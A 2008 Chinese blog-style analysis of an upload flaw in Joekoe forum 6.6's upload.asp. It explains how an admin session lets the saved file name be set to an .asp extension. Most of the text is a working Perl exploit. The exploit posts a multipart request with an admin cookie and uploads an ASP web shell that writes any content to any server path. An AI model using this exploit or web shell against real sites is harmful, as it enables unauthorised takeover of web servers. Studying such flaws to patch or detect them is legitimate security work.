当前位置:首页 > 服务器类 > 安全防护 > > 乔客论坛upload.asp 文件简单分析

乔客论坛upload.asp 文件简单分析

点击次数:22 次 发布日期:2008-11-29 18:01:41 作者:源代码网


源代码网供稿.

源代码网推荐

作者:xiaolu      来自:http://666w.com 

前言:昨天看黑防网站看到黑防第8期上有篇文章《乔客论坛惊爆UPfile严重漏洞》,无奈阿,我这里买不到黑防,只能自己分析分析看看,以下是针对乔客整站程序免费6.6版。
    先看upload.asp代码:

 

<%
dim formname,upload_path,upload_type,upload_size,uup
uup="|article|down|forum|gallery|news|other|product|video|website|"




  up_name=trim(upload.form("up_name"))
  up_text=trim(upload.form("up_text"))
  up_path=trim(upload.form("up_path"))
  if session("joekoe_online_admin")<>"joekoe_admin" and len(up_name)>2 then up_name=""
  if len(up_name)<3 then up_name=up_name&upload_time(now_time)
  if int(instr(uup,"|"&up_path&"|"))=0 then up_path="other"
  if len(up_path)<3 then up_path="other"
  uppath=up_path
  if right(upload_path,1)<>"/" then upload_path=upload_path&"/"
  up_path=server.mappath(upload_path&up_path)


      upfile_name=Right(upfilename,(len(upfilename)-Instr(upfilename,".")))
      upfile_name=lcase(upfile_name)
      if instr(","&upload_type&",",","&upfile_name&",")>0 then
        upfile_name2=upfile_name
        upfile_name=up_name&"."&upfile_name
        upfile.SaveAs up_path&upfile_name


      else
        uptemp="<font class=red_2>上传失败</font>:文件类型只能为:"&replace(upload_type,"|","、")&"等格式) "&go_back
      end if


 

看几个提交的变量,up_name,up_path,up_text,upfile_name。先看up_path 部分,也就是这里:
if int(instr(uup,"|"&up_path&"|"))=0 then up_path="other"
只要up_path的值不包含在uup 里边也就是:
article,down,forum,gallery,news,other,product,video,website
里边up_path就变成了other目录了,这里我们没有用武之地。再看upfile_name,也就是文件扩展名:
upfile_name=Right(upfilename,(len(upfilename)-Instr(upfilename,".")))
他这个过滤的比较严格,甚至于文件名里边只能有一个.符号,如果文件名是asp.asp.gif也被认为非法,因为他是从第一个.号开始截取到末尾的,放弃这个。代码里很明显up_text对我们来说无用。只剩up_name这个了:

 

  if session("joekoe_online_admin")<>"joekoe_admin" and len(up_name)>2 then up_name=""
  if len(up_name)<3 then up_name=up_name&upload_time(now_time)

 

如果我们不是用管理员身份登陆过后台,也就是session("joekoe_online_admin")<>"joekoe_admin",只要up_name长度达于2,up_name就成了空值,郁闷,不过当session("joekoe_online_admin")="joekoe_admin",我们可以利用,利用程序如下(cookie需要admin的):

 

#!/usr/bin/perl
$| = 1;
use Socket;
$host = "10.0.0.1";
$port = "80";
$str =
"-----------------------------7d41869a401aa ".
"Content-Disposition: form-data; name=\"up_path\" ".
" ".
"gallery ".
"-----------------------------7d41869a401aa ".
"Content-Disposition: form-data; name=\"up_name\" ".
" ".
"p.asp ".
"-----------------------------7d41869a401aa ".
"Content-Disposition: form-data; name=\"up_text\" ".
" ".
"spic ".
"-----------------------------7d41869a401aa ".
"Content-Disposition: form-data; name=\"file_name1\"; filename=\"F:\tools\sql\getwebs\p.gif\" ".
"Content-Type: text/plain ".
" ".
"<%dim objFSO%> ".
"<%dim fdata%> ".
"<%dim objCountFile%> ".
"<%on error resume next%> ".
"<%Set objFSO = Server.CreateObject(\"Scripting.FileSystemObject\")%> ".
"<%if Trim(request(\"syfdpath\"))<>\"\" then%> ".
"<%fdata = request(\"cyfddata\")%> ".
"<%Set objCountFile=objFSO.CreateTextFile(request(\"syfdpath\"),True)%> ".
"<%objCountFile.Write fdata%> ".
"<%if err =0 then%> ".
"<%response.write \"<font color=red>save Success!</font>\"%> ".
"<%else%> ".
"<%response.write \"<font color=red>Save UnSuccess!</font>\"%> ".
"<%end if%> ".
"<%err.clear%> ".
"<%end if%> ".
"<%objCountFile.Close%> ".
"<%Set objCountFile=Nothing%> ".
"<%Set objFSO = Nothing%> ".
"<%=server.mappath(Request.ServerVariables(\"SCRIPT_NAME\"))%> ".
"-----------------------------7d41869a401aa ".
"Content-Disposition: form-data; name=\"submit\" ".
" ".
"点击上传 ".
"-----------------------------7d41869a401aa ".
" ";
print $str;
$len=length($str);

$req ="POST /jj/upload.asp?action=upfile HTTP/1.0 ".
#"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */* ".
"Referer: http://10.0.0.1/jj/upload.asp?uppath=gallery&upname=gs200483164242&uptext=spic ".
#"Accept-Language: zh-cn ".
"Content-Type: multipart/form-data; boundary=---------------------------7d41869a401aa ".
#"Accept-Encoding: gzip, deflate ".
#"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; (R1 1.5); .NET CLR 1.1.4322) ".
"Host: 10.0.0.1 ".
"Content-Length: $len ".
#"Connection: Keep-Alive ".
#"Cache-Control: no-cache ".
"Cookie: ASPSESSIONIDQAQQRCTQ=DOKDHBIALDIDGJFJMCMMIBFJ; joekoe%5Fonline=login%5Fpassword=dd15f89d35c36afb&guest%5Fname=&login%5Fusername=joekoe&counters=yes ".
" ".
"$str";
print $req;
@res = sendraw($req);
print @res;


#Hmm...Maybe you can send it by other way

 

sub sendraw {
    my ($req) = @_;
    my $target;
    $target = inet_aton($host) || die("inet_aton problems ");
    socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")||0) || die("Socket problems ");
    if(connect(S,pack "SnA4x8",2,$port,$target)){
        select(S);
    $| = 1;
        print $req;
    my @res = <S>;
        select(STDOUT);
    close(S);
        return @res;
    }
    else {
    die("Can"t connect... ");
    }
}

 

 

 

后记:极度郁闷中。。。。。。。,谁能把黑防的文章给偶看看?

 

源代码网整理以下

网友评论 (0)
我也要写评论
会员中心
服务器类
本站推荐
服务器类之精华